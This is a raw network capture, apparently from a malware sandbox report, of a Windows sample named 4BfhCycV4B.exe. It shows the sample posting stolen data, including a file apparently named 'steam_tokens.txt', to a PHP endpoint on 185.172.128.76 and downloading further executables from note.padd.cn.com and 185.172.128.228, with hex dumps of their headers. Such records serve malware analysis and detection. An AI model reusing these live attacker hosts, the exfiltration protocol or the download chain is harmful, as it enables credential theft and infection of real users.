                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:26.160927057 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAF
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:26.488856077 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:26.496653080 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:26.818052053 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:26.828859091 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDG
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:27.154762030 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:27 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:27.162348986 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAF
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:27.487993956 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:27 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:27.499489069 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:27.829974890 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:27 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:27.875730991 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDG
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:28.197808981 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:29.775583982 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HIEHDHCFIJDBFHJJDBFH
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:30.101774931 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:29 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:30.149338007 CEST564OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJ
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 363
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file"------IDAAFBGDBKJJJKFIIIJJ--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:30.477977037 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:30.742116928 CEST204OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 127543
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:31.440407038 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:31.550086021 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHI
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 267
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 31 38 31 38 31 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"1818166------BKECAEBGHDAEBFHIEGHI--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:31.876765966 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      4192.168.2.549709176.97.76.106805148C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.793889999 CEST186OUTGET /1/Qg_Appv5.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: note.padd.cn.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.027872086 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:13:06 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Content-Length: 8538160
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 22 Apr 2024 21:57:43 GMT
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      ETag: "6626dd57-824830"
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 41 fc f8 63 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 cc 0d 00 00 28 74 00 00 00 00 00 e8 e4 0d 00 00 10 00 00 00 f0 0d 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 82 00 00 04 00 00 29 e5 82 00 02 00 40 01 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 28 34 00 00 00 30 10 00 a4 8a 72 00 00 00 00 00 00 00 00 00 00 f8 81 00 30 50 00 00 00 f0 0e 00 78 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 89 0e 00 10 08 00 00 00 c0 0e 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 b2 0d 00 00 10 00 00 00 b4 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 54 16 00 00 00 d0 0d 00 00 18 00 00 00 b8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 2c 27 00 00 00 f0 0d 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 20 53 00 00 00 20 0e 00 00 00 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 28 34 00 00 00 80 0e 00 00 36 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 f6 03 00 00 00 c0 0e 00 00 04 00 00 00 2e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 3c 00 00 00 00 d0 0e 00 00 00 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 0e 00 00 02 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 36 01 00 00 f0 0e 00 00 38 01 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 a4 8a 72 00 00 30 10 00 00 8c 72 00 00 6c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 00 00 00 00 00 7a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7PELAc(t@)@@(40r0Px6.text `.itextT `.data,'(@.bss S .idata(46@.didata.@.tls<2.rdata2@@.reloch684@B.rsrcr0rl@@@z@@
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.027913094 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34
                                                                                                                                                                                                                                                                                      Data Ascii: @Boolean@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.027951002 CEST1289INData Raw: 43 00 f4 ff 01 17 40 00 43 00 f4 ff 2c 17 40 00 43 00 f4 ff 55 17 40 00 43 00 f4 ff 81 17 40 00 43 00 f4 ff bd 17 40 00 43 00 f4 ff f8 17 40 00 43 00 f4 ff 33 18 40 00 43 00 f4 ff 79 18 40 00 42 00 f4 ff b3 18 40 00 42 00 f4 ff ed 18 40 00 42 00
                                                                                                                                                                                                                                                                                      Data Ascii: C@C,@CU@C@C@C@C3@Cy@B@B@B3@Cq@C@C@J@J3@Jf@J@J@J#@J\@J@K@J@MTObject&\N@Create@Self$
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.028000116 CEST1289INData Raw: 00 04 53 65 6c 66 02 00 08 1c 1c 40 00 01 00 03 4f 62 6a 02 00 02 00 2b 00 50 4f 40 00 0b 47 65 74 48 61 73 68 43 6f 64 65 03 00 9c 10 40 00 08 00 01 08 1c 1c 40 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 50 51 40 00 08 54 6f 53 74 72 69 6e 67 03
                                                                                                                                                                                                                                                                                      Data Ascii: Self@Obj+PO@GetHashCode@@Self3PQ@ToString\@@Self@\@[HQ@SafeCallException@@Self@ExceptObject@ExceptAddr1hQ@AfterConstruction
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.028038025 CEST1289INData Raw: 00 00 00 8c 1e 40 00 01 00 00 00 00 02 00 0c 1f 40 00 14 09 50 56 61 72 41 72 72 61 79 20 1f 40 00 02 00 00 00 00 24 1f 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75
                                                                                                                                                                                                                                                                                      Data Ascii: @@PVarArray @$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data@Bounds@TVarData@VType@Res
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.028075933 CEST1289INData Raw: 00 00 00 02 0a 49 64 65 6e 74 69 66 69 65 72 02 00 02 00 00 00 1c 24 40 00 14 10 50 45 78 63 65 70 74 69 6f 6e 52 65 63 6f 72 64 34 24 40 00 02 00 38 24 40 00 0e 10 54 45 78 63 65 70 74 69 6f 6e 52 65 63 6f 72 64 50 00 00 00 00 00 00 00 00 08 00
                                                                                                                                                                                                                                                                                      Data Ascii: Identifier$@PExceptionRecord4$@8$@TExceptionRecordP@ExceptionCode@ExceptionFlags$@ExceptionRecord@ExceptionAddress@NumberParametersExceptionInform
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.028134108 CEST1289INData Raw: 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 8b 48 28 89 4a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 8b 48 30 89 4a 30 df 7a 28 df 7a 20 df
                                                                                                                                                                                                                                                                                      Data Ascii: zzz:@(hhhh H(J(z zzz:(hhhh h(H0J0z(z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l|<x,<DD
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.028171062 CEST1289INData Raw: fe 2c 0a 04 00 76 08 8b c7 83 e8 10 89 70 08 8b d3 8b c7 8b ce e8 d5 fb ff ff 8b c7 e8 8e 03 00 00 8b c3 83 c4 20 5d 5f 5e 5b c3 8d 50 03 c1 ea 03 3d 2c 0a 00 00 53 8a 0d 51 20 4e 00 0f 87 48 02 00 00 84 c9 0f b6 82 e0 28 4e 00 8d 1c c5 78 f0 4d
                                                                                                                                                                                                                                                                                      Data Ascii: ,vp ]_^[P=,SQ NH(NxMuVSB9tB#HJPt([SK;CwvBKP[JYK[#t #t #t@=(NujH#_
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.028208971 CEST1289INData Raw: 30 0b 00 00 72 c2 e8 f7 f6 ff ff eb bb 90 8b 4e f8 29 ce 01 cb 81 f9 30 0b 00 00 72 b1 89 f0 e8 de f6 ff ff eb a8 81 3d 3c 2a 4e 00 e0 ff 13 00 75 2c 83 ee 10 8b 06 8b 56 04 89 50 04 89 02 c6 05 37 2a 4e 00 00 68 00 80 00 00 6a 00 56 e8 cb f3 ff
                                                                                                                                                                                                                                                                                      Data Ascii: 0rN)0r=<*Nu,VP7*NhjV^[9C<*N8*N7*N1^[[HSVK9r7@9r^[Ot^[
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.028245926 CEST1289INData Raw: c1 e8 19 81 e2 ff ff ff 01 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 18 81 e2 ff ff ff 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 17 81 e2 ff ff 7f 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83
                                                                                                                                                                                                                                                                                      Data Ascii: 000?000G_@SVM^[St@[dM4dM[USvh
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.261908054 CEST1289INData Raw: e8 3b 0b 00 00 8d 85 dc 07 fe ff 33 c9 ba 00 40 00 00 e8 29 0b 00 00 33 c0 89 85 f8 47 fe ff c6 85 ff 47 fe ff 01 8b 3d 2b 2a 4e 00 e9 82 00 00 00 8b c7 e8 c4 f9 ff ff 8b d8 85 db 74 72 8b c3 83 e8 04 8b 30 f7 c6 01 00 00 00 75 56 f7 c6 04 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: ;3@)3GG=+*Ntr0uVtUYCG}7G5u GGGG.u'*NrJN7u&GsG


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      5192.168.2.549711185.172.128.228805148C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.647006035 CEST185OUTGET /BroomSetup.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.228
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850066900 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:14 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                      Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
                                                                                                                                                                                                                                                                                      ETag: "4a4030-613b1bf118700"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Length: 4866096
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
